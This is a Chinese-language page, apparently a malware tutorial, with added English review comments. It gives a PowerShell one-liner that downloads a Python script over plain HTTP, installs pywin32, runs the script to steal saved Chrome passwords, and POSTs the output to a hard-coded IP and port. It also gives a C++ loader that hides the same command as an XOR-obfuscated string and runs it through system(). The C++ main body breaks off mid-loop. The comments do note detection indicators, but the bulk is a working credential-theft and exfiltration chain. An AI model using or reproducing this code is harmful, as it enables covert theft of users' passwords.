获取 Chrome 密码的部分是 lijiejie 的 python 脚本,因此这段 powershell 代码依赖于目标机器上已经存在并在 PATH 中的 python 和 pip(pywin32 通过 pip 在线安装,所以还要求能访问外网)。另外注意:脚本以明文 HTTP 从第三方域名下载、结果回传到硬编码的 IP:端口,这两处在网络层都是可直接用于检测的指标。
powershell代码:
#1 Download the script into the user's temp directory. Plain HTTP, no hash or
#   signature check: whatever the server (or anyone on the path) returns is run in step 3.
Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt
#2 Install pywin32, which the script uses for decryption (presumably win32crypt/DPAPI
#   for Chrome's saved passwords - not verifiable from this page). Requires pip on PATH
#   and outbound network access.
pip install pywin32
#3 Run the downloaded Python script (requires python on PATH).
python $env:temp/update.txt
#4 Exfiltration: POST a file to the hard-coded collector IP:port, again over plain HTTP.
#   NOTE(review): -InFile points at the same path the script was downloaded to, so this
#   only returns harvested data if the Python script overwrites update.txt with its
#   output; otherwise it just sends the script itself back. Confirm against the script.
Invoke-RestMethod -Uri http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt
# Final combined one-liner (the four steps above joined with ';'):
powershell "Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt ;pip install pywin32; python $env:temp/update.txt ; Invoke-RestMethod -Uri http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt"
C++实现:
#include "windows.h"#include "string.h"using namespace std;int main(){ char cDllname[] = "\x7c\x62\x67\x72\x63\x65\x3f\x75\x7d\x7d"; char cSystem[] = "\x62\x68\x62\x65\x74\x7c";//"system"; char cPayload[] = "\x61\x7e\x66\x74\x63\x62\x79\x74\x7d\x7d\x31\x33\x58\x7f\x67\x7e\x7a\x74\x3c\x46\x74\x73\x43\x74\x60\x64\x74\x62\x65\x31\x3c\x44\x63\x78\x31\x79\x65\x65\x61\x2b\x3e\x3e\x6b\x79\x74\x7d\x78\x3f\x7e\x63\x76\x3e\x75\x70\x65\x70\x3e\x23\x21\x20\x29\x21\x29\x26\x28\x24\x26\x23\x22\x3f\x65\x69\x65\x31\x3c\x5e\x64\x65\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x2a\x61\x78\x61\x31\x78\x7f\x62\x65\x70\x7d\x7d\x31\x61\x68\x66\x78\x7f\x22\x23\x2a\x31\x61\x68\x65\x79\x7e\x7f\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x31\x2a\x31\x58\x7f\x67\x7e\x7a\x74\x3c\x43\x74\x62\x65\x5c\x74\x65\x79\x7e\x75\x31\x3c\x44\x63\x78\x31\x31\x79\x65\x65\x61\x2b\x3e\x3e\x25\x24\x3f\x22\x23\x3f\x27\x27\x3f\x20\x25\x22\x2b\x29\x21\x21\x20\x3e\x63\x74\x72\x67\x61\x7e\x62\x65\x3f\x61\x79\x61\x31\x3c\x5c\x74\x65\x79\x7e\x75\x31\x41\x7e\x62\x65\x31\x3c\x58\x7f\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x7d\x7e\x76\x33"; static bool bIsUpdated = false; if(!bIsUpdated){ for(int i=0; i
如果在 VS2017 中遇到类型转换的编译错误(工程默认定义了 UNICODE,GetModuleHandle 实际解析为 GetModuleHandleW,参数类型是 LPCWSTR 而不是 char*),可以用下面这段代码替换 main() 中对应的几行:先将 char* 转换成 LPCWSTR,再取函数地址调用。
// Drop-in replacement for the GetModuleHandle/GetProcAddress lines of main() when the
// project is built with UNICODE defined (the VS2017 default): GetModuleHandle then
// resolves to GetModuleHandleW and takes an LPCWSTR, so the narrow cDllname is widened
// first. Uses cDllname, cSystem, cPayload and bIsUpdated declared in main().
//
// NOTE(review): the pointer type name (PGNSI) is lifted from the MSDN
// GetNativeSystemInfo sample, but what is actually resolved and called here is the
// CRT's system(). It is declared WINAPI (__stdcall) returning void, while system() is
// __cdecl returning int; on x86 that is a calling-convention mismatch (caller and
// callee disagree on who cleans the argument off the stack), on x64 it happens to work.
typedef void (WINAPI *PGNSI)(char *);
PGNSI pGNSI;
WCHAR wszClassName[256];
// strlen+1 includes the terminating NUL, so the wide buffer comes out NUL-terminated.
// cDllname must already be de-obfuscated at this point: under the XOR key 0x11 implied
// by the "system" comment next to cSystem, its bytes spell "msvcrt.dll".
MultiByteToWideChar(CP_ACP, 0, cDllname, strlen(cDllname) + 1,
                    wszClassName, sizeof(wszClassName) / sizeof(wszClassName[0]));
// Per the Win32 contract GetModuleHandle only returns a DLL that is already mapped in
// this process; a VS2017 build normally links ucrtbase/vcruntime rather than
// msvcrt.dll, so a non-NULL handle is not guaranteed. Neither this return value nor
// GetProcAddress's is checked, and a NULL pGNSI is then called through below.
pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(wszClassName), cSystem);
// cPayload decodes (same key) to the PowerShell one-liner shown earlier on this page;
// handing it to system() spawns a command interpreter (typically cmd.exe /c) ->
// powershell -> python, which is the process chain a defender can alert on.
pGNSI(cPayload);
bIsUpdated = true;